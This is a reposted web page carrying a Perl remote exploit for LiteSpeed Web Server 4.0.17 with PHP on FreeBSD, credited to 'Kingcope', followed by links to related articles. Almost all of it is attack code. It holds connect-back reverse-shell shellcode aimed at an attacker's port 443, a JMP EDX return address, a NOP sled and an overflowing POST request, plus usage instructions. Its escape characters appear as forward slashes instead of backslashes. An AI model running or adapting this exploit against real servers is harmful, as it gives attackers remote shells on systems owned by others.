LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
2011-04-29 01:49
1001 查看
备份存档..
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD # bug discovered & exploited by Kingcope # # Dec 2010 # Lame Xploit Tested with success on # FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 # FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 # FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86 # can be used against the admin interface (port 7080), too # Xploit only works on default lsphp binary not the compiled version # # this should be exploitable on linux too (on the compiled SAPI version) # the shipped linux version of lsphp has stack cookies enabled, # which could be brute forced if there wasn't a null put at the end of # the exploit buffer. The compiled SAPI version is exploitable, but then # the offsets differ from box to box, so this time FreeBSD targets only. # thus on linux this is very tricky to exploit. # this is a proof of concept, don't try this on real boxes # see lsapilib.c line 1240 (http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz) use IO::Socket; $|=1; #freebsd reverse shell port 443 #setup a netcat on this port ^^ $bsdcbsc = # setreuid, no root here "/x31/xc0/x31/xc0/x50/x31/xc0/x50/xb0/x7e/x50/xcd/x80". # connect back :> "/x31/xc0/x31/xdb/x53/xb3/x06/x53". "/xb3/x01/x53/xb3/x02/x53/x54/xb0". "/x61/xcd/x80/x31/xd2/x52/x52/x68". "/x41/x41/x41/x41/x66/x68/x01/xbb". "/xb7/x02/x66/x53/x89/xe1/xb2/x10". "/x52/x51/x50/x52/x89/xc2/x31/xc0". "/xb0/x62/xcd/x80/x31/xdb/x39/xc3". "/x74/x06/x31/xc0/xb0/x01/xcd/x80". "/x31/xc0/x50/x52/x50/xb0/x5a/xcd". "/x80/x31/xc0/x31/xdb/x43/x53/x52". "/x50/xb0/x5a/xcd/x80/x31/xc0/x43". "/x53/x52/x50/xb0/x5a/xcd/x80/x31". "/xc0/x50/x68/x2f/x2f/x73/x68/x68". "/x2f/x62/x69/x6e/x89/xe3/x50/x54". "/x53/x50/xb0/x3b/xcd/x80/x31/xc0". "/xb0/x01/xcd/x80"; sub usage() { print "written by kingcope/n"; print "usage:/n". "litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>/n/n". "example:/n". "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php/n/n"; exit; } if($#ARGV ne 3) { usage; } $target = $ARGV[0]; $port = $ARGV[1]; $cbip = $ARGV[2]; $file = $ARGV[3]; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4); #my $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => 8088, # Proto => 'tcp'); #$a = "A" x 500; #print $sock "POST /phpinfo.php HTTP/1.1/r/nHost: 192.168.2.5/r/n/r/n"; #$x = <stdin>; #$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE #$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE $ret = pack("V", 0x080F40CD); # JMP EDX lsphp my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $port, Proto => 'tcp'); $a = "A"x 263 . "AAAA"x 6 . $ret . "C"x 500; $sc = "/x90"x 3000 . $bsdcbsc; print $sock "POST //x90/x90/x90/x90/x90/x90/xeb/x50/../$file? HTTP/1.1/r/nHost: $target/r/nVVVV: $sc/r/n$a KINGCOPEH4XXU:/r/n/r/n"; while(<$sock>) { print; }
相关文章推荐
- “error: PAM: authentication error for root” when trying to SSH to FreeBSD server as “root”
- Hmailserver+Apache+PHP+Mysql+AfterLogic Webmail lite+squirrelMai框架整合
- php中$_SERVER参数HTTP_X_FORWARDED_FOR & REMOTE_ADDR与获取IP
- php中$_SERVER参数HTTP_X_FORWARDED_FOR & REMOTE_ADDR与获取IP
- LiteSpeed Web Server Source Code Information Disclosure Vulnerability
- php中$_SERVER参数HTTP_X_FORWARDED_FOR & REMOTE_ADDR与获取IP
- php中$_SERVER参数HTTP_X_FORWARDED_FOR & REMOTE_ADDR与获取IP
- FreeBSD Install Nginx Webserver
- linux/freebsd下php连接ms sqlserver
- Webserver issues | PHP manager for IIS
- php中$_SERVER参数HTTP_X_FORWARDED_FOR & REMOTE_ADDR与获取IP
- php中$_SERVER和HTTP_X_FORWARDED_FOR以及REMOTE_ADDR获取IP的区别
- php中$_SERVER参数HTTP_X_FORWARDED_FOR & REMOTE_ADDR与获取IP
- Sun Java Web Server version 7.0 update 7 remote stack overflow exploit
- FreeBSD Install Nginx Webserver
- Exploit for the FreeBSD protosw vulnerability
- Installing DB2 for Linux under FreeBSD using Linux compat
- freebsd ports 安装 mongodb php 扩展
- zenddebugger for freebsd
- freebsd8.2搭建apache2.2+tomcat6.x+mysql5.5 web服务器,乱码问题